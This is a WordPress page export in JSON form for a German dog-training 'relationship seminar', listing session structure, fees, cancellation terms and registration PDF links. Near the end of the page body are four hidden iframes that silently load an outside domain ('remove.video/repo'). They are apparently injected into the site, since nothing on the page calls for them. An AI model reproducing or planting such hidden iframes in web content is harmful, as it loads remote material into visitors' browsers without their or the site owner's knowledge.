{"id":1812,"date":"2015-07-20T12:37:10","date_gmt":"2015-07-20T10:37:10","guid":{"rendered":"http:\/\/www.hubert-asam.de\/?page_id=1812"},"modified":"2021-12-19T09:29:38","modified_gmt":"2021-12-19T08:29:38","slug":"beziehungs-seminar","status":"publish","type":"page","link":"https:\/\/www.hubert-asam.de\/?page_id=1812","title":{"rendered":"Beziehungs-Seminar"},"content":{"rendered":"<p>[et_pb_section][et_pb_row][et_pb_column type=&#8220;1_3&#8243;][et_pb_image admin_label=&#8220;Bild&#8220; src=&#8220;http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/IMG_0081.jpg&#8220; show_in_lightbox=&#8220;off&#8220; url_new_window=&#8220;off&#8220; animation=&#8220;left&#8220; sticky=&#8220;off&#8220; align=&#8220;left&#8220; force_fullwidth=&#8220;off&#8220; always_center_on_mobile=&#8220;on&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220; \/][\/et_pb_column][et_pb_column type=&#8220;2_3&#8243;][et_pb_text admin_label=&#8220;Text&#8220; background_layout=&#8220;light&#8220; text_orientation=&#8220;left&#8220; use_border_color=&#8220;off&#8220; border_color=&#8220;#ffffff&#8220; border_style=&#8220;solid&#8220;]<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-264\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/logo100sw.jpg\" alt=\"logo100sw\" width=\"100\" height=\"58\" \/><\/a><\/p>\n<h3>Beziehungs\u00a0 \u2013 Seminar<\/h3>\n<p>Beziehungsseminare sind 4 \u2013 Stunden Seminare. Die Stunden sind Einzellektionen.<br \/>\nBeziehungsseminare k\u00f6nnen \u00fcberall nach individueller Vereinbarung stattfinden, an allen Seminarorten.<br \/>\nSeminare an denen Basisseminare angeboten werden, bieten auch immer die M\u00f6glichkeit zu einem Beziehungsseminar.<\/p>\n<p>Dem Beziehungsseminar mu\u00df ein Basisseminar bei mir oder einem meiner Sch\u00fcler\/Kollegen vorrausgehen.<\/p>\n<p>Beziehungsseminare beinhalten\u00a0 4 Einzellektionen, zudem Unterricht in Theorie.<\/p>\n<p>Ein Beziehungsseminar dient der Vertiefung der jeweiligen individuellen Themen\/Problemen.<br \/>\nSoziale Sprache wird im Familienkontext verfeinert.<\/p>\n<h3>Beziehungsseminare:<\/h3>\n<p>CH: 300.-\u20ac,<br \/>\nI: 300.-\u20ac<br \/>\nD: 240.-\u20ac<\/p>\n<p>Wiederholereinzelstunde: 60.-\u20ac<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022-1.pdf\">Anmeldeformular 2022<\/a><\/p>\n<p>&nbsp;<\/p>\n<h3>andere Seminarkosten<\/h3>\n<p>Basis-Seminar:<br \/>\nCH: 600.- \u20ac,<br \/>\nI: 600.- \u20ac<\/p>\n<p>&nbsp;<\/p>\n<p>Tages \u2013 Themenseminare (F\u00e4hrte): 120.-\u20ac<br \/>\nP\u00e4dagogische Module (K\u00f6rpersprache, erste Hilfe, Naturheilkunde, Archetypen, Initiation,Archaik, Intuition, Kreativit\u00e4t etc.) : 300.-\u20ac<\/p>\n<p>Wochenseminare: 900.-\u20ac (incl \u00dcbernachtung im DZ, Begleitperson + 100.-\u20ac)<br \/>\nWochenseminare p\u00e4dagogische Module (K\u00f6rpersprache, Archaik): 900.-\u20ac pro Person<br \/>\nWochenseminar exclusiv: 2400.- \u20ac<\/p>\n<p>Ich erteile keinen Unterricht an Menschen die selbst Unterricht erteilen.<br \/>\nDaf\u00fcr biete ich Ausbildungen an.<\/p>\n<p>ALLE PREISE SIND ANMELDEGEB\u00dcHREN UND MIT DER ANMELDUNG F\u00c4LLIG<br \/>\nBei zwingenden! Gr\u00fcnden ist innerhalb von Deutschland eine Abmeldung bis 2 Wochen vor dem Seminar auf Kulanz m\u00f6glich. F\u00fcr Italien empfehle ich eine Reiser\u00fccktrittsversicherung.<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2017\/03\/Vorbereitungsbogen.pdf\">Vorbereitungsbogen<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1677\" src=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/pdf1.gif\" alt=\"pdf\" width=\"30\" height=\"28\" \/><\/a>\u00a0<a href=\"http:\/\/www.hubert-asam.de\/WP\/wp-content\/uploads\/2015\/07\/Anmeldeformular-2022-1.pdf\">Anmeldeformular 2022<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/?page_id=1809\">BASISSEMINAR MIT HUND<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/?page_id=1812\">BEZIEHUNGSSEMINAR MIT HUND<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/?page_id=1814\">JAHRESSEMINAR<\/a><\/p>\n<p><a href=\"http:\/\/www.hubert-asam.de\/?page_id=1817\">AUSBILDUNGEN<\/a><\/p>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<div><iframe loading=\"lazy\" id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\" width=\"300\" height=\"150\"><\/iframe><\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p><div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div><div class=\"et_pb_row et_pb_row_0 et_pb_row_empty\">\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t<\/div> Beziehungs\u00a0 \u2013 Seminar Beziehungsseminare sind 4 \u2013 Stunden Seminare. Die Stunden sind Einzellektionen. Beziehungsseminare k\u00f6nnen \u00fcberall nach individueller Vereinbarung stattfinden, an allen Seminarorten. Seminare an denen Basisseminare angeboten werden, bieten auch immer die M\u00f6glichkeit zu einem Beziehungsseminar. Dem Beziehungsseminar mu\u00df ein Basisseminar bei mir oder einem meiner Sch\u00fcler\/Kollegen vorrausgehen. Beziehungsseminare beinhalten\u00a0 4 Einzellektionen, zudem [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"class_list":["post-1812","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/1812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1812"}],"version-history":[{"count":19,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/1812\/revisions"}],"predecessor-version":[{"id":4425,"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=\/wp\/v2\/pages\/1812\/revisions\/4425"}],"wp:attachment":[{"href":"https:\/\/www.hubert-asam.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}